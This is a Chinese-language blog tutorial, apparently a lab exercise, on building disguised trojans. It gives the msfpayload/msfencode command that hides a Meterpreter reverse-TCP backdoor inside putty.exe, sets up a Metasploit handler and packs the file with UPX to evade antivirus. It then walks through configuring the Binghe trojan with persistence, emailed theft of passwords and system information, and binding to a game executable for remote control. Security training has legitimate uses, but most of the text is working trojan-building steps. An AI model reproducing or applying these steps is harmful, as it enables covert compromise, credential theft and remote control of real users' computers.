伪装木马渗透攻击

admin 2022年3月1日23:33:06评论118 views1字数 1795阅读5分59秒阅读模式

伪装木马渗透攻击

一、Meterpreter后门攻击


注:其中所有实验工具均在附件中 需要请自行下载

实验环境


一台BackTrack  5虚拟机当作攻击机 一台Windows Server 2003当作靶机
注意:刚开始进入BackTrack  5是命令行界面的话,要敲“startx”命令来进入图形化界面。

实验步骤


先将真机中下载好的putty.exe拖进BackTrack  5的/root/Desktop目录下


伪装木马渗透攻击


然后输入以下命令(其中LHOST要输入本机的ip地址,而这里就是攻击机的地址):


msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=80 R | msfencode -t exe -x /root/Desktop/putty.exe -k -o putty_backdoor.exe -e x86/shikata_ga_nai -c 5


伪装木马渗透攻击


然后可以发现Desktop文件夹下出现了一个putty_backdoor.exe的文件。


伪装木马渗透攻击


将目录下的putty_backdoor.exe拷贝到靶机


伪装木马渗透攻击


这时回到BackTrack  5攻击机,命令行敲“msfconsole”,进入metasploit。
使用exploit/multi/handler攻击模块。


伪装木马渗透攻击


设置payload为windows/meterpreter/reverse_tcp


伪装木马渗透攻击


先来show options,看看要设置啥,再设置LHOST和LPORT,LHOST是设置为本机即攻击机的ip地址。


伪装木马渗透攻击


伪装木马渗透攻击


输入“exploit”进行攻击


伪装木马渗透攻击


然后在靶机上安装杀毒软件,发现部分杀毒软件可以识别后台木马。通过UPX来实现加强免杀。将UPX软件解压缩之后放在Desktop目录下然后执行免杀。


root@bt:~/example_01# upx -6 -o putty_backdoor_upx6.exe putty_backdoor.exeUltimate Packer for eXecutablesUPX 3.04        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 27th 2009File size         Ratio      Format      Name--------------------   ------   -----------   ---------------------------552960->275968  49.91%  win32/pe  putty_backdoor_upx6.exe


将putty_backdoor_upx6软件放在靶机上,再次测试杀毒


二、冰河木马后门攻击


实验环境


WinServer 2003为攻击机,WinXP为靶机

实验步骤


下载冰河木马到Windows server 2003


伪装木马渗透攻击

伪装木马渗透攻击


在WinServer 2003上运行冰河木马客户端,制作冰河木马;
打开冰河木马。


伪装木马渗透攻击


打开服务器配置


伪装木马渗透攻击


设置访问口令(必须设置,不然没法访问靶机),其他为默认,也可以修改安装路径、文件名称、进程名称、监听端口等等。


伪装木马渗透攻击


设置关联启动(自我保护)当冰河后门被关闭之后通过txt或者exe文件复活


伪装木马渗透攻击


设置邮箱通知,当地址发生变动时,发送邮件,将系统、密码等信息发送过来


伪装木马渗透攻击


点击确定


伪装木马渗透攻击


在WinXP上种入冰河木马(服务器),用WinServer 2003控制WinXP;
将攻击机上的G_Server.exe复制到靶机WIN XP上。


伪装木马渗透攻击


双击该病毒,并观察后台任务管理器


伪装木马渗透攻击


关闭此进程,删除G_Server文件


伪装木马渗透攻击


新建任意的TXT文档,并打开,看看后门是否能够自动启动


伪装木马渗透攻击


伪装木马渗透攻击


名字变了,但是同样可以看到后门程序
在攻击机上开启G_Client.exe并远程控制靶机
扫描靶机(定义IP地址范围)


伪装木马渗透攻击


伪装木马渗透攻击


显示ok说明可以进行连接,此时可以访问此靶机


伪装木马渗透攻击


可以通过命令控制台对靶机进行各种控制,包括文件上传下载、远程控制、信息查看等等。


伪装木马渗透攻击


远程卸载冰河木马
检查系统文件,删除C:Windowsystem32下的 Kernel32.exe和 Sy**plr. exe文件。


伪装木马渗透攻击

伪装木马渗透攻击

伪装木马渗透攻击

伪装木马渗透攻击


将冰河木马与普通程序捆绑,再次在WinXP上种入冰河木马,通过冰河远程查看WinXP主机系统信息。


打开exe捆绑软件,第一个选择你的游戏程序;


伪装木马渗透攻击


第二个选择你的木马程序;


伪装木马渗透攻击


指定保存的路径:


伪装木马渗透攻击


点击开始捆绑,成功后将木马拷贝被攻击方再测试一遍


伪装木马渗透攻击

木马文件


伪装木马渗透攻击


在WinXP上种入冰河木马(红心大战1)并双击


伪装木马渗透攻击


重新搜索机子


伪装木马渗透攻击


在windows2003上面查看WinXP主机系统信息


伪装木马渗透攻击

伪装木马渗透攻击

本文始发于微信公众号(疯猫网络):伪装木马渗透攻击

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月1日23:33:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   伪装木马渗透攻击http://cn-sec.com/archives/503446.html

发表评论

匿名网友 填写信息